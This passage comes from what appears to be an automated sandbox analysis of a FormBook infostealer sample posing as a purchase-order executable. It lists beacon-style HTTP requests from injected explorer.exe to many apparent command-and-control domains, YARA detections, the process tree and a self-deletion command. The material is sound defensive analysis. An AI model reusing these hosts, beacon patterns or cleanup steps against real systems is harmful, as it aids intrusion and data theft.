6e 3a 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 20 31 73 20 6c 69 6e 65 61 72 0d 0a 09 7d 0d 0a 09 2e 61 6c 65 72 74 2d 73 65 63 2d 74 65 78 74 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 09 74 6f 70 3a 20 31 31 70 78 3b 0d 0a 09 6c 65 66 74 3a 20 31 39 30 70 78 3b 0d 0a 09 77
                                                                        Data Ascii: <!DOCTYPE html><html><title>&#20122;&#21338;&#22269;&#38469;</title><head><meta charset="GBK"><meta http-equiv="Cache-Control" content="no-siteapp" /><meta http-equiv="Cache-Control" content="no-transform" /><meta name="applicable-device" content="pc,mobile"><meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /><style>body {margin: 0;padding: 0;background: #E6EAEB;font-family: Arial, '', '', sans-serif}a{ text-decoration: none;color: #7B7B7B;}@media screen and (min-width:1100px) {.alert-box {display: none;position: relative;margin: 96px auto 0;padding: 180px 85px 22px;border-radius: 10px 10px 0 0;background: #FFF;box-shadow: 5px 9px 17px rgba(102,102,102,0.75);width: 286px;color: #FFF;text-align: center}.alert-box p {margin: 0}.alert-circle {position: absolute;top: -50px;left: 111px}.alert-sec-circle {stroke-dashoffset: 0;stroke-dasharray: 735;transition: stroke-dashoffset 1s linear}.alert-sec-text {position: absolute;top: 11px;left: 190px;w


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.7497373.12.202.1880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Nov 20, 2020 11:07:21.718597889 CET611OUTGET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1
                                                                        Host: www.placeduconfort.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Nov 20, 2020 11:07:21.831310034 CET618INHTTP/1.1 404 Not Found
                                                                        Date: Fri, 20 Nov 2020 10:07:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 153
                                                                        Connection: close
                                                                        Server: nginx/1.16.1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:16.363661051 CET | 5429 | OUT | GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1
Host: www.searchnehomes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:16.486833096 CET | 5429 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 20 Nov 2020 10:08:16 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb6e13a-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.7 | 49764 | 3.134.22.63 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:21.799002886 CET | 5430 | OUT | GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1
Host: www.happinestbuilders.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:21.912847042 CET | 5431 | IN | HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2020 10:08:21 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.7 | 49765 | 52.58.78.16 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:26.980870962 CET | 5432 | OUT | GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1
Host: www.hemparcade.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:26.997565985 CET | 5432 | IN | HTTP/1.1 410 Gone
Server: openresty/1.13.6.2
Date: Fri, 20 Nov 2020 10:07:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.hemparcade.com/' />a </head>9 <body>3a You are being redirected to http://www.hemparcade.coma </body>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49752 | 160.153.136.3 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:31.979074955 CET | 5366 | OUT | GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1
Host: www.heartandcrowncloset.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:32.004002094 CET | 5366 | IN | HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49753 | 194.35.122.226 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:38.803448915 CET | 5367 | OUT | GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1
Host: www.fahufu.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:38.979562044 CET | 5368 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 10:07:38 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49754 | 104.253.79.71 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:44.378768921 CET | 5369 | OUT | GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1
Host: www.the-gongs.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:44.546214104 CET | 5370 | IN | HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2020 10:07:44 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.6.40
Last-Modified: Wed, 11 Nov 2020 11:47:08 GMT
ETag: "844-5b3d35aea7a9c"
Accept-Ranges: bytes
Content-Length: 2116
Connection: close
Content-Type: text/html; charset=GB2312
Data Ascii: <!doctype html><html><head><meta charset="gb2312"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="format-detection" content="telephone=no"><title>404</title><style>html, body{height:95%;}body{background: #0f3854;background: -webkit-radial-gradient(center ellipse, #0a2e38 0%, #000000 70%);background: radial-gradient(ellipse at center, #0a2e38 0%, #000000 70%);background-size: 100%;}p{margin:0;padding:0;}#clock{font-family: 'Share Tech Mono', monospace;color: #ffffff;text-align: center;position: absolute;left: 50%;top: 50%;-webkit-transform: translate(-50%, -50%);transform: translate(-50%, -50%);color: #daf6ff;text-shadow: 0 0 20px #0aafe6, 0 0 20px rgba(10, 175, 230, 0);}#clock .time{letter-spacing: 0.05em;font-size: 60px;padding: 5px 0;}#clock .date{letter-spacing:0.1em;font-size:15px;}#clock .text{letter-spacing:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49756 | 35.246.6.109 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:49.679070950 CET | 5395 | OUT | GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1
Host: www.shopnicknaks.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:49.761483908 CET | 5396 | IN | HTTP/1.1 301 Moved Permanently
Date: Fri, 20 Nov 2020 10:07:49 GMT
Content-Length: 0
Connection: close
location: https://www.shopnicknaks.com/igqu?7nExDDz=93%2FRz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ%3D%3D&znedzJ=zZ08lr
x-wix-request-id: 1605866869.73454800764115109
Age: 0
Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
Cache-Control: no-cache
Expires: -1
X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgSFlZwT1h+4EK4tuzq33cp,2d58ifebGbosy5xc+FRaloPX4ngKfQM8fEHbwELHijl2HyxYZMvqhoRodhfrjmMmWIHlCalF7YnfvOr2cMPpyw==,Nlv1KFVtIvAfa3AK9dRsI891F5cPV4/7uVPnrpzkrLQfbJaKSXYQ/lskq2jK6SGP,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,qquldgcFrj2n046g4RNSVLBEueY9AnibOH2EZLjRrdE=,Ts+7R/4FijtA6c9psi3FQGZDSpRGFXLWKPmpDzjzFFOTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9n3wTMzaU7zAZzBAj7gVU/QH0ckLmbyjm6dEUakZt5J0lud4WLlKsLIaRlCjaOj8vGQ2Otd3B2C27oTTIAKJtQ==
Server: Pepyaka/1.19.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.7 | 49758 | 185.201.11.126 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:07:54.966870070 CET | 5412 | OUT | GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1
Host: www.sweetbasilmarketing.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:07:55.281188011 CET | 5413 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
X-Powered-By: PHP/7.2.34
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr
X-Litespeed-Cache: miss
Content-Length: 0
Date: Fri, 20 Nov 2020 10:07:55 GMT
Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.7 | 49759 | 52.71.133.130 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:00.453313112 CET | 5415 | OUT | GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1
Host: www.justsoldbykristen.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:00.556266069 CET | 5416 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty/1.17.8.2
Date: Fri, 20 Nov 2020 10:08:00 GMT
Content-Type: text/html
Content-Length: 175
Connection: close
Location: https://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.7 | 49760 | 13.226.173.80 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:05.674489975 CET | 5416 | OUT | GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1
Host: www.ariasu-nakanokaikei.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:05.691483021 CET | 5417 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Fri, 20 Nov 2020 10:08:05 GMT
Content-Type: text/html
Content-Length: 183
Connection: close
Location: https://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr
X-Cache: Redirect from cloudfront
Via: 1.1 a7d79448ea7ebb4dc0f6ccd1869d1444.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: MXP64-C3
X-Amz-Cf-Id: PiI-7O_5hgynQNqcUEPysWt8N7YtagWkWw-rfcfszvXMzZkpJvTNCw==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.7 | 49761 | 103.224.182.242 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:08:11.059438944 CET | 5419 | OUT | GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1
Host: www.realitytvstockwatch.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:08:11.264870882 CET | 5419 | IN | HTTP/1.1 302 Found
Date: Fri, 20 Nov 2020 10:08:11 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: __tad=1605866891.2635384; expires=Mon, 18-Nov-2030 10:08:11 GMT; Max-Age=315360000
Location: http://ww25.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr&subid1=20201120-2108-1134-9a4d-df9dc2e636a2
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 11:06:24
Start date: 20/11/2020
Path: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Imagebase: 0x7fffae0c0000
File size: 369664 bytes
MD5 hash: 4142C1713DA2F4F94BEC71BFED46587B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                        General

                                                                        Start time:11:06:24
                                                                        Start date:20/11/2020
                                                                        Path:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\Purchase Order 40,7045$.exe
                                                                        Imagebase:0x7fffae0c0000
                                                                        File size:369664 bytes
                                                                        MD5 hash:4142C1713DA2F4F94BEC71BFED46587B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:11:06:27
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff662bf0000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:11:06:39
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                        Imagebase:0x140000
                                                                        File size:29184 bytes
                                                                        MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:11:06:43
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
                                                                        Imagebase:0x870000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:11:06:44
                                                                        Start date:20/11/2020
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff774ee0000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis
